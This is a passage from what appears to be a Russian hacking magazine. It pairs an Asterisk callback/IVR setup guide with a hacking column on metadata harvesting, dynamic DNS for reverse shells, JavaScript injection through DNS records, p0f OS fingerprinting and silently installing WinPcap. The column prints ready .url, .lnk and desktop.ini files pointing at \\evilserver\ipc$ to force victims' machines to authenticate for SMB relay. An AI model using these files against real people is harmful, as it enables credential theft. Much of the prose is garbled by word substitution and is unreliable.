. Пусть мой горожанин факс 010309: [fromgorod] exten=> 010309. Функция NoOp позволяет отвести во микроконсоль Asterisk молитва тож состояние переменной.. в качестве кого а Asterisk узнает об этом? Все хватит просто. а подключается из первых рук ко SIM-карте (смотри картинку). по образу включить PINкод.s. Обрати внимание.%m. что-то факс может приходить без 0 во начале. звонок хорэ двигать получи и распишись голосовое карточка (IVR). Непонятной может показаться последняя ажур «GoToIf($["${pin}" !=""]?ivr-pass. Вместе не без; Asterisk зачастую используют MySQL. В результате на XÀÊÅÐ 00 /141/ 00 сервере создается депо Asterisk.1)». имя) равно заполняем параметрами одного с пользователей: CREATE TABLE "callback" ( "phone" varchar(80) NOT NULL default "". равным образом взбучить вход.GoToIf($["${CALLERID(number)}"= "8901234567"]?ivr. если бы их полноте 00? Изящнее общей сложности показать всех пользователей на специальной базе данных.MYSQL(Fetch fetchid ${resultid} pin callback) exten=> 010309. факс пользователя определяется равным образом сверяется не без; базой данных.n.. со какого подворье пришел вызов. в то время изготовление вызова пройдет согласно обычной схеме. INSERT INTO callback(phone.n. Если от постоялый двор 0901234567. pin. а подальше — факс на звонка. говорит самочки вслед себя: на первых порах обращаемся к базе.n. рано или поздно постоянно подготовление выполнены. на которой принимать сводка CDR. ÎÁÐÀÁÎÒÊÀ ÇÂÎÍÊΠТеперь.Answer() . звонящему нужно довольно всего прибрать взаимосвязанность во девяносто шестой пробы книге. позволено починать ко организации нашего сервиса.%d.%d. и. сообразно сути. нужно включить выше- свЯязанный отрывок [fromgorod]: exten=> 010309. а там из через SQL-запроса получаем мера про номера звонящего абонента равно обрабатываем их.n.1) exten=> 010309. в таком случае вызов уходит на свЯязанный отрывок IVR.NoOp(zvonyat s nomera ${CALLERID(all)}) exten=> 010309. а звонок и запрос ко callback-системе хорошенького понемножку произведен автоматически.GoToIf($["${pin}" !=""]?ivrpass.Answer() .n. а вторая — дату да эпоха звонка. При входящем звонке налаженность хорош отпускать факс звонящего.MYSQL(Query resultid ${connid} select pin. Если во результате запроса стриптиз сорная ежовник не пропадет на базе.GoToIf($["${CALLERID( number)}"="8901234567"]?ivr. ради выработать авторизацию пользователя. ведь поглощать во вкусе будут себя водить безвыездно входящие и исходящие вызовы) равным образом находим контекст.NoOp(${STRFTIME(${EPOCH}.NoOp(zvonyat s nomera ${CALLERID(all)}) exten=> 010309. Первая линия выводит во микроконсоль Caller ID звонящего. трест со данными есть.s. "pin" int(11) NOT NULL default "4321". И начнем наша сестра вместе с того. callback from callback where phone=${CALLERID(number)}) exten=> 010309. user) values("8901234567". оно проверяет.s. "callback" int(11) NOT NULL default "0"..%Y%H:%M:%S)}) exten=> 010309. "user" varchar(255) NOT NULL default "" ). аргумент callback. "Aggressor").Îòâå÷àåì Каждая строчка. Но что.n. Голосовые меню. Для работы системы сие невыгодный нужно. Строка «exten=> 010309. называются 035 . если бы некто принимать в «списке». PIN-код...Îòâå÷àåì .NoOp(${STRFTIME(${EPOCH}. Для этого открываем получи и распишись Астериске обложка /etc/asterisk/extensions. которые взаимодействуют со пользователем.n.n. в таком случае аргумент pin полноте безграмотный пустой. ÍÀÑÒÐÀÈÂÀÅÌ IVR Итак.MYSQL(Disconnect ${connid}) exten=> 010309.1)» — сие неполное ветвление.. воеже протоколировать во нее логи звонков — CDR.1. и тогда тогда отшлифовка вызова пойдет во контексте ivr-pass. ужотко указываем пользователя.MYSQL(Clear ${resultid}) exten=> 010309.1) exten=> 010309. После ввода пароля создаем таблицу (телефон. да при отладке куда полезно.n. что-то поменяем где-то называемый контекст.SIM-карта равно SIM Dialer ради нее Создаем таблицу во MySQL этого 0G-модем. если бы а стриптиз другой.n. "2602". Итак. в таком случае прописать под отдельный их факс уже одну строчку во конфиге малограмотный полноте большущий проблемой.n. достоинство которого безграмотный превышает 0000 рублей. Для сотового телефона не грех купить какой угодно SIM Dialer. таблицу да требование получи и распишись пуск пароля. Стоит такая штука копейки.MYSQL(Connect connid localhost asterisk asterisk asterisk) exten=> 010309. на котором будет предложено нанять PIN-код. Asterisk настроен по инструкциям с статей. Что дальше? Необходимо просадить ему инструкции.conf (в этом файле описывается чертеж набора.%Y%H:%M:%S)}) exten=> 010309.1. Если callback-системой достаточно черпать под лад человек.n.s.%m. Мы на этой базе создадим до сейте поры одну таблицу — callback.n. на кой приходят постоянно входящие наружи звонки: у меня симпатия называется [fromgorod]. Для сего на рента набираем «mysql -u asterisk -p asterisk». каковой позволит пользоваться экий схемой звонков максимально спокойно — сообразно сути.NoOp(pin -> ${pin} callback# -> ${callback}) exten=> 010309.

а допускается опробовать сальдо иначе говоря выслать SMS: CLI>datacardsms datacard0 09000000000 Hello! CLI>datacardussd datacard0 *102# [datacard0] Got USSD response: "Áàëàíñ 055. нужно убедиться. Потом ждем выбора пользователя 00 секунд.Hangup exten=> t.Dial(SIP/bla1/${EXTEN} exten=> 09XXXXXXXXX .Hangup exten=> 0495XXXXXXX.so на /usr/lib/ asterisk/modules.n.n.49 ð. В этом конфиге по мнению умолчанию прописаны двоечка устройства [datacard0] да [datacard1] — одно удаляем. Если введен PIN не хлеще четырех символов. появился ли chan_datacard.Set (tnum=0) => s.1.1. нужен VoIP-GSM шлюз. в таком случае а самое происходит да от переменной tnum.n.1.WaitExten(10) exten=> 09XXXXXXXXX.Background(WelcomePass) .n. который некто поддерживает голос.Set(tnum=$[${tnum} + 0]) exten=> t.1.n.1) exten=> _XXXX.Set (inum=0) exten=> s.Hangup() => t.n.Set(inum=$[${inum} + 0]) exten=> i.1) => i. При каждом неверном вводе воспроизводится типовой вал pbx-invalid. оно нам далеко не нужно. же равным образом рядовой федерационный сотовый.PC_ZONE Входящий звонок во CLI от номера.Playback(pbx-invalid) => i. exten=>s.Hangup. Далее проверяем.1. кладем трубку: exten=> i.Background(Welcome) =>s.GotoIf($["${inum}" < "3"]?s.Set(inum=$[${inum} + 0]) => i.1) XÀÊÅÐ 00 /141/ 00 .Hangup ÍÀÑÒÐÀÈÂÀÅÌ GSM-ØËÞÇ В качестве заезжий дом доступа покойно пускать в дело отнюдь не исключительно SIPномер. равным образом всего за третьей неудачной попытки взять трубку. С его использованием можно безграмотный лишь произвести освященный традицией callback.n. Можно где раки зимуют свЯязанный отрывок равным образом принимать/совершать звонки.s.1) => t.s.1.32 да выше. В нашем список двум опции: 0 — трындануть равно 0 — сменить PIN-код: [ivr-out] exten=> s. После того. org/svn/chan_datacard). Скачиваем да устанавливаем узел чтобы Asterisk (www.1. Так иначе говоря иначе.GotoIf($["${inum}" < "3"]?s.1) => i.1. пользу кого этого отлично подойдет 0G USB-модем HUAWEI Е1550. куда как подключен шлюз.n.Hangup() Контекст ivr начинается от обнуления двух переменных inum равно tnum — сие число неверных попыток ввода равным образом сумма прошедших таймаутов.1. ещё раз же. Àíÿ+Ñàøà=ëþáîâü.1) exten=> i.Dial(SIP/bla2/${EXTEN} exten=> 0495XXXXXXX . GoToIf($["${EXTEN}"= "${pin}"]?ivr.n.n.1.1.Playback(pbx-invalid) exten=> i. которые совпадают не без; PIN-кодом. каковой реализует работу от 0G-модемом. Появился? Хорошо.GoTo(ivr-ch-pin. в таком случае кладем трубку: exten=> t.1.GoTo(ivr-out. ведь автор сих строк переходим на контекст ivr. которого в отлучке на базе Входящий контекст IVR. и про него: [datacard0] audio=/dev/ttyUSB1 data=/dev/ttyUSB2 context=datacard-incoming group=1 rxgain=3 txgain=3 Теперь сохраняет изменения. Àóòåáÿ? Øëè ÈÈìÿ+Èìÿ íà 0050 0ð" 036 История обработки вызова call-файла Здесь наш брат воспроизводим колесо WelcomePass (его никуда не денешься прежде передразнить на /var/lib/asterisk/sounds/ru).Hangup exten=> 0[2-8]XXXXXXXXX. кто по-черному продают операторы сотовой связи.1.6. Чтобы подключить сотовый штукенция ко Астериску.Hangup exten=> i. ко примеру.n.WaitExten(10) exten=> _XXXX.n. Меняем разъем. Если вслед сие времена лажовый номер не введен.Hangup() exten=> t. а аргумент inum увеличивается сверху 0. [ivr] exten exten exten exten exten exten exten exten exten exten exten exten exten =>s. же равно материализовать попятный повестка чрез SMS.Set (inum=0) =>s.n.Hangup exten=> i. звонок перекидывается возьми ivr-pas: [ivr-pass] exten=> s.Background(beep) exten=> s.1.s.GotoIf($["${tnum}" < "3"]?s.n. за Hangup прописать возможность единаче пару присест учредить PIN.conf на /etc/asterisk. Прежде нежели подключить модем. перезапускаем Астериск — некто готов к работе.GotoIf($["${tnum}" < "3"]?s.makhutov. После трех ошибок кладется трубка. разве были введены четыре символа.1.Dial(SIP/blabla3/${EXTEN} exten=> 0[2-8]XXXXXXXXX . из-за ним ожидаем ввод номера интересах звонка./trunk/ etc/datacard. что комната абонента определился.1. сие может определить прога MICRO-BOX HUAWEI MODEM UNLOCKER.WaitExten(10) => 0. Она же снимет привязку ко определенному оператору.n.1) => 0. Далее воспроизводится изолятор Welcome.n. Руками копируем . Никто никак не мешает.1. Для нормальной работы нам потребуется косточка 0.Set (tnum=0) exten=> s.Hangup.n.n.Set(tnum=$[${tnum} + 0]) => t.n.n.

Как но сие сделать? В Астериске поглощать эдак называемые call-файлы. ÍÀÑÒÐÀÈÂÀÅÌ CALLBACK Добавить гибкости.1) exten=> s.agi да перемещаем на /var/lib/asterisk/ agi-bin. Таким образом равно происходит инверсный вызов. Когда ты да я создавали таблицу callback. GoToIf($["${callback}"!= "0"]?callback. воплощение которого начнется потом поднятия трубки. происходит подсоединение для базе равным образом пополнение PIN-кода во таблице. обложка удалится.Hangup exten=> i. Из минусов — близ звонке будет улетучиваться твой CallerID. позволяется выискать такого VoIPпрова.n.1. Как вариант.agi. для который будем перезванивать. вместе с которого начнется обработка (укажем 0) Archive — разве выставить Yes. каждое устремленность соединяется при помощи строгий транк (аккаунт VoIP-провайдера): blabla1. особенно за границы своего города тож на роуминге.Hangup() exten=> i. PHP. Внешний скрипт не грех писать бери Perl.1. Предлагаю обоссать желательный нам скрипт нате Bash — сие элементарнее и быстрее всего.. Мы звоним держи наш номер. тут позже выполнения call-файла в /var/spool/asterisk/outgoing_done позволено полноте взглянуть историю обработки вызова. сим ты да я равно воспользовались.WaitExten(10) exten=> _XXXX. задним числом которого не запрещается нанимать номер для звонка.Hangup exten=> t. agi равным образом передает двум переменных: факс равным образом UNIQUEID на качестве названия пользу кого call-файла.hangup Первая строчка на [callback] запускает скрипт подо названием callback. Тестовый звонок… да. Отредактируем свЯязанный отрывок ivr-pass и создадим последний callback: [ivr-pass] exten=> s. во вкусе расторчь попытку дозвониться. C. Если имущество сего поля не непропорционально 0. При вызове скрипта с контекста на Астериске ему будут переданы двум переменных: выпуск телефона ($1 во скрипте). тот или иной позволяет насолить принадлежащий (или хоть произвольный) CallerID. Когда последний PIN введен. Но ваш покорнейший слуга выпивши ожидать :). Создаем конфиг равно заполняем следующим: Channel: SIP/blabla1/8901234567 MaxRetries: 0 RetryTime: 0 WaitTime: 00 Context: ivr-pass Extension: s Priority: 0 Archive: Yes Что за. какой отвечает из-за смену PIN’а: первоначально воспроизводится «бииип».MYSQL(Connect connid localhost asterisk asterisk asterisk) exten=> _XXXX. чтобы мы невыгодный тратились бери исходящие звонки из сотового.Background(beep) exten=> s. В контексте ivr-ch-pin. Bash.. какой полноте набран. Если нет слов промежуток времени одной с попыток пользователь возьмет трубку.1.Hangup() [ivr-ch-pin] exten=> s.MYSQL(Query resultid ${connid} update callback set `pin`=${EXTEN} where phone=${CALLERID(number)}) exten=> _XXXX. которое объединение умолчанию в равной степени 0. Priority — сие первородство экстеншина s. насколько времени необходимо ждать поднятия трубки вплоть до того.n. впоследствии в чем дело? дается 00 сек бери пуск нового PIN’а. Еще единолично порок системы — увеличенное времена соединения. в чем дело? наша callback-система должна самочки перезванивать.n. При входящих звонках да мы не без; тобой получаем значение сего полина вмести от PIN-кодом. Ее плюсы очевидны: дозволительно достижимо считать каждую копейку быть звонках. Можно быть одним.n. которые позволяют активировать предписание да со-вмещать двушничек номера. :)z 037 . да прозвище call-файла ($2 во скрипте).n.n.1. не запрещается возле помощи AGI (AsteriskGatewayInterface).apken=> t. равным образом ради зачем отвечает: Channel — указывает тип. blabla2 или — или blabla3.1.1.1. У меня близ звонке чрез sim-dialer через момента вызова номера в взаимосвязанность листе накануне «гудков» получи комплектованный выпуск уходит примерно 20-25 секунд. GoToIf($["${EXTEN}"= "${pin}"]?ivr.Hangup [callback] exten=> s. В конфиге у нас прописаны три направления: сотовые. Если разработанный обложка перебазировать на /var/spool/asterisk/outgoing/. Extension — сие пункт на контексте ivr-pass. Context — сие контекст.n. CALL-ÔÀÉËÛ Â ASTERISK"Å Собственно. Время каждой попытки дозвона — 00 секунд.Hangup() exten=> t.MYSQL(Disconnect ${connid}) exten=> _XXXX. авторизуемся от через PIN-кода.${callback}. WaitTime — оный параметр указывает.s.1) exten=> _XXXX. то Астериск зараз начнет вызванивать нате стриптиз 0901234567 (причем рекоменXÀÊÅÐ 00 /141/ 00 дуется call-файл то-то и есть перемещать.Background(WelcomePass) . Вначале воспроизводится типовой «бииип». ÏËÞÑÛ È ÌÈÍÓÑÛ Результат всех сих действий — полноценная callback-система. и так двоечка раза. подставляя надлежащий номер.AGI(callback.1. Москва равно межгород. так будем перезванивать. только про каждого направления не возбраняется выбрать наиболее выгодного VoIP-оператора.1. В ближайших планах — прикрутить к системе биллинг равным образом исполнить запрещение звонка посредством сайт. со сего момента теория еще работает. а отнюдь не копировать). после того вводим выпуск телефона. постоянно работает! Однако во самом начале статьи пишущий сии строки говорили о том. интерфейса взаимодействия со внешними скриптами. Как только они будут исчерпаны. MaxRetries — параметр определяет величина попыток дозвона. exten=>s.s. продавая callback равно как услугу. когда возьмут трубку (пишем здесь s). то концепция попытается нанять экстеншен s на контексте callback. у абонента где бы сего достаточно высвечиваться стриптиз VoIP-оператора. бери кой Asterisk да перенаправляет выше- звонок.WaitExten(10) exten=> _XXXX.n. RetryTime — момент в кругу повторениями. затем а штучка набирается заново. глядеть дьявол полноте так: #!/bin/bash echo Channel: SIP/blabla1/$1 > /tmp/$2 echoMaxRetries: 0 >> /tmp/$2 echoRetryTime: 0 >> /tmp/$2 echoWaitTime: 00 >> /tmp/$2 echo Context: ivr-pass >> /tmp/$2 echo Extension: s >> /tmp/$2 echo Priority: 0 >> /tmp/$2 echo Archive: Yes >> /tmp/$2 mv /tmp/$2 /var/spool/asterisk/outgoing Готовый обложка называем callback.${UNIQUEID}) exten=>s.Hangup() В контексте ivr-out прописаны исходящие звонки.n. номинация транка да закидон телефона.то сделали на ней поляна callback.

равно для нам притекает :). www. èìÿ êîìïüþòåðà. идеже симпатия сие беретка (жаль. Фишка таких DNS во установке маленького времени получай отживание записей — почти пары-тройки минут. вытекание здесь. на которых всё-таки точно описано. который до этого времени образ действий легальны (в смысле.ВЗЛОМ Тюрин «GreenDog» Алекс идеже требуются внутренние резервы по привязке.. Все утекает куда-то. Большую порция метаданных позволяется почистить/посмотреть прям во Офисе иначе во Винде на свойствах файла: http://support. êîììåíòàðèè. о поднятии своего динамического DNS (кстати. раскопать ее согласно имени — мягко :). принимать целый ряд сфер. Там а вкушать описание. невыгодный палясь. но нашел двум отличные статьи. Также Майкрософт выпустила тулзы к чистки. ничто трудного) — habrahabr. на испанском). согласен равным образом суммарно ни у кого об этом ни болтовня (смотри ссылку ранее возьми сайт МС). реверсовые шеллы не грех скреплять безграмотный ко статическим IP. Или прошлых жертв со динамическими IP находить. целесообразно воссоздать кучку скандалов.no-ip. на которой был создан файл. org/security/reversing_ole/index. freedns. Итак. чаятельно даже если нужная равно полезная на определенных ситуациях. потому другие DNS безвыгодный помещают их на особый кэш. èìåíà ïðèíòåðîâ â ñèñòåìå.ru/ blogs/linux/101380. в качестве кого оно делается.1a И во всякое время можешь.com Authorization: Basic ëîãèí_è_ïàññ_â_base64 User-Agent: blah-blah-blah v. наша сестра без затей смотрим файлики. В них присутствует разнообразная инфа. особенно разве наша цель — корпоративная сетка.com Easy Hack ¹1 ХАКЕРСКИЕ СЕКРЕТЫ ПРОСТЫХ ВЕЩЕЙ ЗАДАЧА: ПРОСМОТР МЕТАДАННЫХ В ОФИСНЫХ ДОКУМЕНТАХ РЕШЕНИЕ: Ни ради кого далеко не секрет. А бывает. Решается сия проблема.0. Пробежался согласно ним — и уже собрал пачку инфы. âåðñèÿ îôèñà è ÎÑ. шиш рядом этом невыгодный ломая). Просмотреть всю инфу не запрещается ручками. íàçâàíèå îðãàíèçàöèè. особенно из-за границей. истинно равно просмотрщики питаться (smartpctools. сколько доки равно во веб выкладывают. хотя малый с головой контора «самое важное» сохраняет вслед них. Но мы-то смотрим от непохожий стороны. зачем документы изо офиса (и далеко не только) содержат во себя метаданные. В общем-то.dyndns.com) — habrahabr. равно лакомиться приступ ко файл-серверу от общими доками. какая инфа хранится.ru/blogs/webdev/101336. reverse_https во MSF). О важности такого типа инфы пусть даже болтать никак не стоит. да поглощать пока что штабель аналогов через сторонних разработчиков. XÀÊÅÐ 00 /141/ 00 . Утечка там. âñå ïóòè õðàíåíèÿ ôàéëîâ. ориентировочный список. Я было хотел написать. равным образом полезно.microsoft. В России метаданными жидко который пользуется. имена пользователей.0 Host: dynupdate. Вот лишь квалифицированная провайдеров лицевой айпишник выделяют всего только вслед за денежку. В первой — до этого времени этапы настройки вместе с привязкой для бесплатным сервисам (типа. заграничная практическая деятельность — всегда доки выкладывать в pdf’ках. микроформат офисовских документов доступен. Вторая 038 Метаданные во каком-то doc-файле: разночтение ОС равно офиса.html) умеет приобретать версию ОС. Главное. ñêðûòûé è óäàëåííûé òåêñò. равно в духе ее обчистить ручками. Вообще. ïî÷òà ïîëüçîâàòåëÿ.com. Повесишь жертве «сервачок». таково наравне возле конвертации удаляется большая кусок метаданных. Но вместе с точки зрения безопасности дальше может сохраниться равным образом конфиденциальная информация.no-ip. Но вернемся ко делу. какой-никакой близ выходе на яруча будет отправлять бери безмездный служба HTTP-запрос вида: GET /nic/update?hostname=èìÿ_æåðòâû&myip=åå_ip HTTP/1.org равным образом www. Но да со pdf’ками на томишко а стиле какие-то скандалы были. а к именам (reverse_tcp_dns.. Интересный момент: олдскульная тулза за извлечению метаданных (tarasco. Например. ¹2 ЗАДАЧА: ПРИВЯЗАТЬ ДИНАМИЧЕСКИЙ IP К DNS РЕШЕНИЕ: Иметь теледоступ для своему домашнему компу — сие равным образом приятно. afraid.com/kb/825576/ — описалово. Другие тулзы сего неграмотный умеют. На самом деле. аюшки? пишущий сии строки можем настричь из метаданных: èìÿ ïîëüçîâàòåëÿ. используя эдак называемые Dynamic DNS. è åùå âñÿêàÿ áóðäà :). ñîçäàâøåãî è ïîñëåäíåãî ðåäàêòèðîâàâøåãî ôàéë.

во которые можно подпихать нестандартный код. получается.¹3 ЗАДАЧА: ЗАПИХНУТЬ ЯВАСКРИПТ В DNS-ЗАПИСИ РЕШЕНИЕ: В майском номере ][ моя особа рассказывал для организацию туннеля через DNS-протокол (если вернее — что до шеллкоде). но! Во-первых. чтобы благодеяние либо самоё коннектилась ко нам. пуск p0f возьми прослушку интерфейса (-i) eth0 со выводом полученных сигнатур (-S) да сохранением на обложка (-o): p0f -i eth0 –S –o os. так безграмотный IE (мотаем возьми усишко :).coredump. Вообще. Что малограмотный бог подходяще — нам надо. ежели верно все организовать. реализовав XSS для нескольких публичных сервисов из DNS-lookup’ом. что такое? официальная производство остановилась на 0006 году. целью могут быть.. Что вновь лучше — репорт чувствуется на поколениях ОС.org/book/osdetect. эффективность его вместе с годами больше всего никак не ухудшилась — неодинаковые производители что имели близкие решения всех тонкостей стека. менее точен.. да за набору открытых портов. Версии вкушать по-под по сию пору основные ОС. Осуществлялось сие посредством комбинация тулз — nbtool через Ron’а Bowes (skullsecurity. Прога может пустить в ход нераздельно изо четырех методов: по пакетам из выставленным SYN (по умолчанию) да SYN-ACK. ЗАДАЧА: УДАЛЕННО ОПРЕДЕЛИТЬ ВЕРСИЮ ОС ПО ФИНГЕРПРИНТУ СТЕКА TCP/ IP. не запрещается поучаствовать на бета-тестировании новой версии набора nbtool — 0. Жаль. например. так есть для нормального взаимодействия различных систем хватает. получит свой ява-скрипт. архи часто производится налаживание пакетов бери файрволах. использовал мандара «/» взамен них. ¹4 что сервисы выводят ответы ото DNS-серверов сверх фильтрации! То есть человек. например. Казалось бы. и.cx. Просторы на полета фантазии и новый градиент атаки :). да используя СИ :). ПАССИВНЫЙ МЕТОД РЕШЕНИЕ: Вернемся для классике. в духе решение. Есть бессчетно тонкостей на реализации — какие использовать изначальные значения на полей? Как разменивать их согласно быстро соединения? Как откликаться бери нестандартные запросы? И во каждой конторе. обычная практика. поля. Например. Но по инету покамест раскидано ряд «доделок». Зачем оно надо? Рон привел простенький пример. Рон.. сверху них нашли непохожие ответы. Так что можно. Что до этих пор недурно — симпатия умеет заниматься вместе с pcap-файлами. Но поглощать недоброжелательный схема — держи основе анализа протоколов стека TCP/IP. алгорифм их изменения. К тому же. ничего чрезвычайного.html). во-вторых.pcap 039 . php/Nbtool). А к ускорения сбора можно прибросить «активности». В большинстве DNS-записей нельзя эксплуатнуть пробелы.. Для проведения первый встречный более-менее осмысленной атаки нам чаще всего делов надобно установить ОС. то есть нас определить невозможно. Но сие безграмотный отрицает ее важности да теперь. либо раз как-то дослушивать ее трафик. требуются. Палево небольшое. только зато да мы не без; тобой невыгодный отправляем никаких данных нашей жертве. так на правах самоуправно приступ оригинален (совмещение таких разных вещей) и жаждет дальнейших исследований. Идея во том. Так что-нибудь если есть мысли — поделись не без; автором тулзы. а для того HTML. не откладывая очищать одна проблема. например). таково да имеют. Пассивный. около которой сидит наша жертва. либо логи из автоматическим резолвом имен. Для каждого с методов своя сигнатурная база. Проблема во том. веб-админки. поковырять его на «домашних условиях». на которых нередко бывают всевозможные резолверы. что. файерволы. ОС-фингерпринтинг делится. наравне обычно. имея частный DNS. однако теперь. во активном к этому добавляется отправка жертве всевозможных нестандартных пакетов да недогляд реакции получай них. производящей ОС. Первые крупные работы по части этой теме появились единаче во 0999-2000 годах (когда-то сим равным образом ты да я занимались.org/wiki/index. ага не совсем. XÀÊÅÐ 00 /141/ 00 Детектим ОС вследствие EttercapNG RST— сброска соединения (когда морские ворота закрыт. Пассивный занимается тем. ACK — во передаче данных (совсем экспериментальный). У пассивного метода убирать сызнова одиночный «бонус». на общем. эх. Сделать сие не запрещается разными путями: равным образом с баннеров всевозможных сервисов. который анализирует полина TCP/IP-протоколов начальные значения. Не этак сыздавна возлюбленный запостил безумнейшее исследование в своем блоге (skullsecurity. ты да я не без; через dnsxss можем подделывать DNS-ответы равным образом встраивать на них яваскрипт код. образчик XSS — сие лишь «наметка». они. возлюбленный входит на BackTrack 0. что не позволяется проговорить об активном. К тому же. наснифав у жертвы трафика. так что лейтмотив уж недурно прожевана да числа всего делов интересного можно быстро прогуглить (nmap. например. просканить трал с поддельного IP’шника. а.txt Или скормим ему pcap-файл равно установим детект до RST-пакетам: p0f -R -s test_osdetect. Одним с лучших пассивных ОС-фингерпринтеров является p0f. в отдельных случаях p0f вешают возьми лоток да таким образом получают инфу об всей подсети. равно FF нормально воспринимал HTML. анализ пакетов бери установку соединения. который-нибудь вследствие браузер просмотрит инфу об имени нашего сервера. равно от UDP) четко расписан во RFC: взаимодействие. Кстати.org/blog/?p=433) по части встраивании яваскриптов на DNS-записи да про сего написал прогу– dnsxss (входит в nbtool). настройки сети. Протокол IP равно TCP(есть методы да со ICMP. заголовки. Кроме детекта ОС прога умеет скрывать NAT.05. детство-детство :)). Скачать да уважать доки об нем не грех тогда — lcamtuf. Четко. получай живой равным образом пассивный.

хотя отрыть кого-либо физически — далеко не такая олигодон да проблема. только равным образом они невыгодный оторванно спасают. Итак. Запустить ОС детект во Ettercap позволяется в такой мере (в GTK. Причем для живом человеке. Себя моя персона эврика тремя различными путями! Говоря оборона «стандартные возможности». dns lookup равным образом т. Пишем на текстовый обложка следующее равно сохраняем с расширением url: [InternetShortcut] URL=http://www. либо порыскать во Сети — тама есть. К ним относятся Ink (ярлыки). что-нибудь пользу кого сего должно — влюбленные поисковиков равным образом публичные сервисы.Profiles Кстати.net). А все. В них допускается выделять колея ко нашему серверу. подобно whois. который нам да требуется. а прочие опции глякось в хелпе.ВЗЛОМ Определяем ОС в соответствии с RST-пакетам с pcap-файла Также позволено определять интерфейс для прослушку (promiscuous mode) параметром «-p» равно назначать фильтр возьми пакеты. Кроме атак по части SMB дозволено образовать поголовный «сбор информации» через тот а p0f тож слежку вслед за юзером. и. на правах известно. что-нибудь на интернете позволительно разыскать кучу информации о человеке/организации аж до жалкий зацепке.com IconFile=\\evilserver\ipc$ Где IconFile — указание бери обложка иконки. Например. Безумнейший образец показан на статье attackvector. исследования ОС детекта невыгодный остановились. какой-никакой ссылается для свой сервер. заложенной на p0f). чай даже если хоть сколько-нибудь по головке не погладили во Сеть. в духе Проводник винды обрабатывает кое-кто будущий файлов. кредитной истории равно постоялый двор страховки. Офигеть :). Одним изо важных мест во них была насущность на том.д. создаем url-файл. В нашей стране ПОКА ЧТО весь неграмотный в такой мере жестко. по части сравнению из 000 у p0f. Возможности p0f’а встроены во Ettercap (ettercap. Автор обещал осуществить идею на Nmap. Существуют правила по части соблюдению конфиденциальности. А последний. так чтобы пострадавший подсоединилась для нашему злосерверу. И нет-нет да и абонент будет просматривать папку не без; этими файлами от Проводник (TotalCommander вроде ведет себя также). ваш покорнейший слуга имею на виду то.ini (настройка отображения папок). конечно. p0f еще по установленной форме никак не развивается.ufrn. живет равным образом развивается. И сие лишенный чего социальной инженерии. что хуже. Но лакомиться еще одно решение. XÀÊÅÐ 00 /141/ 00 . Можно. curses-интерфейсе): ¹5 ЗАДАЧА: СОБРАТЬ ИНФОРМАЦИЮ О ЧЕЛОВЕКЕ РЕШЕНИЕ: Ни в целях кого безвыгодный секрет.br/~joaomedeiros/gsoc/2009/proposal/node1. как социальные сети.html — забавнопоказательная занятие 0009 годы ради фингерпринт возьми основе анализа TCP ISN множества пакетов (развитие идеи. sourceforge. безвыгодный обновляются базы сигнатур. получай котором автор сих строк еще да выполняли бы по сию пору необходимые поступки с хешиками пользователей. заморочится равно изготовить свою. идеже да мы от тобой самочки публикуем свою подноготную. равно появляется что-то новое. Вот равным образом базы его имеют подле 0200 сигнатур. От IP-адреса накануне карточка всей семьи. используя регулярные выражения tcpdump’а. в таком случае останется после этого навсегда. 040 1)Sniff — Unified sniffing 2)Start — Start sniffing 3)View .org/invasion-ofprivacy. Заострим не заговаривать зубы нате этом — по образу забаррикадировать их подключиться? Очень пригодно ради таких вещей делать применение из чего стандартными возможностями Windows. dca. url (ярлыки интернета) да desktop. Как уж говорилось ранее.example. И сие отнюдь не говоря насчёт таких вещах. ведь Проводник безотчетно подключится к нашему серверу да попытается авторизоваться. пусть бы сие требует ход ко общему ресурсу на путы иначе говоря к компьютеру жертвы. ¹6 ЗАДАЧА: СКРЫТНО ЗАСТАВИТЬ ЖЕРТВУ ПОДКЛЮЧИТЬСЯ К ОПРЕДЕЛЕННОМУ ХОСТУ РЕШЕНИЕ: В майском номере ваш покорный слуга писал относительно SMB relay-атаках.

начиная с XP. что-то равно прогу. не мудрствуя лукаво так в Винде безвыгодный работают. который также требовал WinPcap про своей работы. а около Win отнюдь не работает (к сожалению). хотя ведь ли возлюбленный отнюдь не круглым счетом хорош. Можно стандартными средствами винды сложить ярлычок да на его настройках учинить расправу траектория предварительно в силу того что установить их достанет трудно.sys нате загрузку подле старте системы. и так непохожие разработчики ПО «тихий установщик» и предлагают следовать денежку. с намерением desktop.-1 равно как минимум. desktop.exe -t l -d \\evilserver\ipc$ Где –t l — указываем субъект — lnk-файл. так равным образом реакция Проводника склифосовский разной: В IconFile — читается. В нем дозволяется показать линия поперед иконки. Данные способы были почерпнуты с еще упомянутого сайта парочки ресерчеров. а дальше обновить его во HEХ-редакторе.dll" â C:\WINDOWS\system32\ 4)"npf. которая может быстренько генерить файлы перечисленных видов. для сожалению. Сделать папку системной дозволяется командой в консоли: attrib +s èìÿ_ïàïêè Зато у методов от иконками вкушать табун — разве опираться малограмотный получай иконку. Оказалось. в таком случае сие ограничение снимается.ini. аюшки? все достаточно просто. Пример из desktop. InfoTip — эпизодически выбирают папку из desktop. разве запустит оный файл. равным образом осложнение решилась. в таком случае питаться равно власть нужны соответствующие. а обхитрить в ту а папку.ini да всеми методами: [. что такое? палевно. а во-вторых.dll" â C:\WINDOWS\system32\ 2)"Packet. Как обычно. xls) файлы. После поставленной задачи были проведены небольшие изыскания. Требуется сумме всего лишь перевести файлы: XÀÊÅÐ 00 /141/ 00 Первые три не возбраняется неграмотный воспроизводить во системную директорию. и всегда сообща почти не ничто неграмотный весят (500 Кб). нам постоянно равно нужно имитировать npf.html). Но сие равно как дозволительно поправить. К тому же. нешто в чем дело? на генерации lnk-файлов: payload. идеже находится подпапка. рано или поздно вожак входит во папку.-1 IconFile=\\evilserver\ipc$ Для того. глотать одно иск — дьявол должен лежать во системной папке. Автоматический коннект для удаленному ресурсу быть просмотре папки ¹7 ЗАДАЧА: ВТИХАРЯ УСТАНОВИТЬ WINPCAP 1)"wpcap. -d — конец для нашему серверу. каждому ПО потребуются домашние библиотеки. к каждой ситуации свое.ShellClassInfo] desktop. В нем не возбраняется дать жизни ссылки нате отечественный сервер на разных местах.ini. По идее. на прошлом номере моя особа писал относительно meterpreter при помощи icmp-туннель.org/security/payload/index.ini.sys на папку вместе с дровами. При использовании библиотек тоже требуются админские права. во-первых. подход для raw-сокетам есть. заходя на папку не без; сим url-файлом. z 041 . Вот во книга но Metasploit’е убирать устройство к удаленного снифинга трафика.URL — слабо перейдет пользователь. ламер а сносно плохого приметить невыгодный может — ярлык может высылаться получи и распишись вещь нужное. Вот только формат ярлыка далеко не позволит отредактировать его во текстовике. Проводник. На нем но выложена 